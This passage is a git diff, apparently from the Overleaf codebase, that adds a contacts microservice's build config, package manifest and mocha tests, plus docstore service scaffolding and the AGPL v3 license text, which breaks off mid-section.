a/services/contacts/docker-compose.yml b/services/contacts/docker-compose.yml new file mode 100644 index 0000000..310220b --- /dev/null +++ b/services/contacts/docker-compose.yml @@ -0,0 +1,56 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/contacts + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/contacts + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/contacts + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/contacts + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + command: npm run --silent test:acceptance + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + diff --git a/services/contacts/package.json b/services/contacts/package.json new file mode 100644 index 0000000..f81f947 --- /dev/null +++ b/services/contacts/package.json @@ -0,0 +1,41 @@ +{ + "name": "@overleaf/contacts", + "description": "An API for tracking contacts of a user", + "private": true, + "type": "module", + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "LOG_LEVEL=fatal mocha --loader=esmock --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "LOG_LEVEL=fatal mocha --loader=esmock --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "mongodb": "6.12.0", + "request": "~2.88.2", + "underscore": "~1.13.1" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "esmock": "^2.6.3", + "mocha": "^11.1.0", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } +} diff --git a/services/contacts/test/acceptance/js/GettingContactsTests.js b/services/contacts/test/acceptance/js/GettingContactsTests.js new file mode 100644 index 0000000..769f7ce --- /dev/null +++ b/services/contacts/test/acceptance/js/GettingContactsTests.js @@ -0,0 +1,121 @@ +import { ObjectId } from 'mongodb' +import request from 'request' +import async from 'async' +import { app } from '../../../app/js/server.js' + +const HOST = 'http://127.0.0.1:3036' + +describe('Getting Contacts', function () { + before(function (done) { + this.server = app.listen(3036, '127.0.0.1', error => { + if (error != null) { + throw error + } + + done() + }) + }) + + after(function () { + this.server.close() + }) + + describe('with no contacts', function () { + beforeEach(function () { + this.user_id = new ObjectId().toString() + }) + + it('should return an empty array', function (done) { + request( + { + method: 'GET', + url: `${HOST}/user/${this.user_id}/contacts`, + json: true, + }, + (error, response, body) => { + if (error) { + return done(error) + } + response.statusCode.should.equal(200) + body.contact_ids.should.deep.equal([]) + done() + } + ) + }) + }) + + describe('with contacts', function () { + beforeEach(function (done) { + this.user_id = new ObjectId().toString() + this.contact_id_1 = new ObjectId().toString() + this.contact_id_2 = new ObjectId().toString() + this.contact_id_3 = new ObjectId().toString() + + const touchContact = (userId, contactId, cb) => + request( + { + method: 'POST', + url: `${HOST}/user/${userId}/contacts`, + json: { + contact_id: contactId, + }, + }, + cb + ) + + async.series( + [ + // 2 is preferred since touched twice, then 3 since most recent, then 1 + cb => touchContact(this.user_id, this.contact_id_1, cb), + cb => touchContact(this.user_id, this.contact_id_2, cb), + cb => touchContact(this.user_id, this.contact_id_2, cb), + cb => touchContact(this.user_id, this.contact_id_3, cb), + ], + done + ) + }) + + it('should return a sorted list of contacts', function (done) { + request( + { + method: 'GET', + url: `${HOST}/user/${this.user_id}/contacts`, + json: true, + }, + (error, response, body) => { + if (error) { + return done(error) + } + response.statusCode.should.equal(200) + body.contact_ids.should.deep.equal([ + this.contact_id_2, + this.contact_id_3, + this.contact_id_1, + ]) + done() + } + ) + }) + + it('should respect a limit and only return top X contacts', function (done) { + request( + { + method: 'GET', + url: `${HOST}/user/${this.user_id}/contacts?limit=2`, + json: true, + }, + (error, response, body) => { + if (error) { + return done(error) + } + response.statusCode.should.equal(200) + body.contact_ids.should.deep.equal([ + this.contact_id_2, + this.contact_id_3, + ]) + done() + } + ) + }) + }) +}) diff --git a/services/contacts/test/setup.js b/services/contacts/test/setup.js new file mode 100644 index 0000000..023fbc1 --- /dev/null +++ b/services/contacts/test/setup.js @@ -0,0 +1,11 @@ +import chai from 'chai' +import chaiAsPromised from 'chai-as-promised' +import sinonChai from 'sinon-chai' +import { ObjectId } from 'mongodb' + +// ensure every ObjectId has the id string as a property for correct comparisons +ObjectId.cacheHexString = true + +chai.should() +chai.use(chaiAsPromised) +chai.use(sinonChai) diff --git a/services/contacts/test/unit/js/ContactsManagerTests.js b/services/contacts/test/unit/js/ContactsManagerTests.js new file mode 100644 index 0000000..f5f5ae5 --- /dev/null +++ b/services/contacts/test/unit/js/ContactsManagerTests.js @@ -0,0 +1,98 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import esmock from 'esmock' +import { ObjectId } from 'mongodb' + +describe('ContactManager', function () { + beforeEach(async function () { + this.clock = sinon.useFakeTimers(new Date()) + + this.db = { contacts: {} } + + this.ContactManager = await esmock('../../../app/js/ContactManager', { + '../../../app/js/mongodb': { + db: this.db, + ObjectId, + }, + }) + + this.user_id = new ObjectId().toString() + this.contact_id = new ObjectId().toString() + }) + + afterEach(function () { + this.clock.restore() + }) + + describe('touchContact', function () { + beforeEach(function () { + this.db.contacts.updateOne = sinon.stub().resolves() + }) + + describe('with a valid user_id', function () { + it('should increment the contact count and timestamp', async function () { + await expect( + this.ContactManager.touchContact(this.user_id, 'mock_contact') + ).not.to.be.rejected + + expect(this.db.contacts.updateOne).to.be.calledWith( + { + user_id: sinon.match(o => o.toString() === this.user_id), + }, + { + $inc: { + 'contacts.mock_contact.n': 1, + }, + $set: { + 'contacts.mock_contact.ts': new Date(), + }, + }, + { + upsert: true, + } + ) + }) + }) + + describe('with an invalid user id', function () { + it('should be rejected', async function () { + await expect( + this.ContactManager.touchContact( + 'not-valid-object-id', + this.contact_id + ) + ).to.be.rejectedWith( + 'input must be a 24 character hex string, 12 byte Uint8Array, or an integer' + ) + }) + }) + }) + + describe('getContacts', function () { + beforeEach(function () { + this.user = { + contacts: ['mock', 'contacts'], + } + this.db.contacts.findOne = sinon.stub().resolves(this.user) + }) + + describe('with a valid user_id', function () { + it("should find the user's contacts", async function () { + await expect( + this.ContactManager.getContacts(this.user_id) + ).to.eventually.deep.equal(this.user.contacts) + + expect(this.db.contacts.findOne).to.be.calledWith({ + user_id: sinon.match(o => o.toString() === this.user_id), + }) + }) + }) + + describe('with an invalid user id', function () { + it('should be rejected', async function () { + await expect(this.ContactManager.getContacts('not-valid-object-id')).to + .be.rejected + }) + }) + }) +}) diff --git a/services/contacts/test/unit/js/HttpControllerTests.js b/services/contacts/test/unit/js/HttpControllerTests.js new file mode 100644 index 0000000..3a7bc15 --- /dev/null +++ b/services/contacts/test/unit/js/HttpControllerTests.js @@ -0,0 +1,127 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import esmock from 'esmock' + +describe('HttpController', function () { + beforeEach(async function () { + const now = Date.now() + + this.contacts = { + 'user-id-1': { n: 2, ts: new Date(now) }, + 'user-id-2': { n: 4, ts: new Date(now) }, + 'user-id-3': { n: 2, ts: new Date(now - 1000) }, + } + + this.ContactManager = { + touchContact: sinon.stub().resolves(), + getContacts: sinon.stub().resolves(this.contacts), + } + + this.HttpController = await esmock('../../../app/js/HttpController', { + '../../../app/js/ContactManager': this.ContactManager, + }) + + this.user_id = 'mock-user-id' + this.contact_id = 'mock-contact-id' + + this.req = {} + this.res = {} + this.res.status = sinon.stub().returns(this.res) + this.res.end = sinon.stub() + this.res.json = sinon.stub() + this.res.send = sinon.stub() + this.res.sendStatus = sinon.stub() + this.next = sinon.stub() + }) + + describe('addContact', function () { + describe('with a valid user_id and contact_id', function () { + beforeEach(async function () { + this.req.params = { user_id: this.user_id } + this.req.body = { contact_id: this.contact_id } + await this.HttpController.addContact(this.req, this.res, this.next) + }) + + it("should update the contact in the user's contact list", function () { + expect(this.ContactManager.touchContact).to.be.calledWith( + this.user_id, + this.contact_id + ) + }) + + it("should update the user in the contact's contact list", function () { + expect(this.ContactManager.touchContact).to.be.calledWith( + this.contact_id, + this.user_id + ) + }) + + it('should send back a 204 status', function () { + expect(this.res.sendStatus).to.be.calledWith(204) + }) + }) + + describe('with an invalid contact id', function () { + beforeEach(async function () { + this.req.params = { user_id: this.user_id } + this.req.body = { contact_id: '' } + await this.HttpController.addContact(this.req, this.res, this.next) + }) + + it('should return 400, Bad Request', function () { + expect(this.res.status).to.be.calledWith(400) + expect(this.res.send).to.be.calledWith( + 'contact_id should be a non-blank string' + ) + }) + }) + }) + + describe('getContacts', function () { + describe('normally', function () { + beforeEach(async function () { + this.req.params = { user_id: this.user_id } + this.req.query = {} + await this.HttpController.getContacts(this.req, this.res, this.next) + }) + + it('should look up the contacts in mongo', function () { + expect(this.ContactManager.getContacts).to.be.calledWith(this.user_id) + }) + + it('should return a sorted list of contacts by count and timestamp', function () { + expect(this.res.json).to.be.calledWith({ + contact_ids: ['user-id-2', 'user-id-1', 'user-id-3'], + }) + }) + }) + + describe('with more contacts than the limit', function () { + beforeEach(async function () { + this.req.params = { user_id: this.user_id } + this.req.query = { limit: 2 } + await this.HttpController.getContacts(this.req, this.res, this.next) + }) + + it('should return the most commonly used contacts up to the limit', function () { + expect(this.res.json).to.be.calledWith({ + contact_ids: ['user-id-2', 'user-id-1'], + }) + }) + }) + + describe('without a contact list', function () { + beforeEach(async function () { + this.ContactManager.getContacts.resolves(null) + + this.req.params = {} + this.req.query = {} + await this.HttpController.getContacts(this.req, this.res, this.next) + }) + + it('should return an empty list', function () { + expect(this.res.json).to.be.calledWith({ contact_ids: [] }) + }) + }) + }) +}) diff --git a/services/contacts/tsconfig.json b/services/contacts/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/contacts/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/docstore/.gitignore b/services/docstore/.gitignore new file mode 100644 index 0000000..84bf300 --- /dev/null +++ b/services/docstore/.gitignore @@ -0,0 +1,8 @@ +node_modules +forever + +# managed by dev-environment$ bin/update_build_scripts +.npmrc + +# Jetbrains IDEs +.idea diff --git a/services/docstore/.mocharc.json b/services/docstore/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/docstore/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/docstore/.nvmrc b/services/docstore/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/docstore/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/docstore/Dockerfile b/services/docstore/Dockerfile new file mode 100644 index 0000000..60a024e --- /dev/null +++ b/services/docstore/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/docstore + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/docstore/package.json /overleaf/services/docstore/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/docstore/ /overleaf/services/docstore/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/docstore/LICENSE b/services/docstore/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/services/docstore/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated 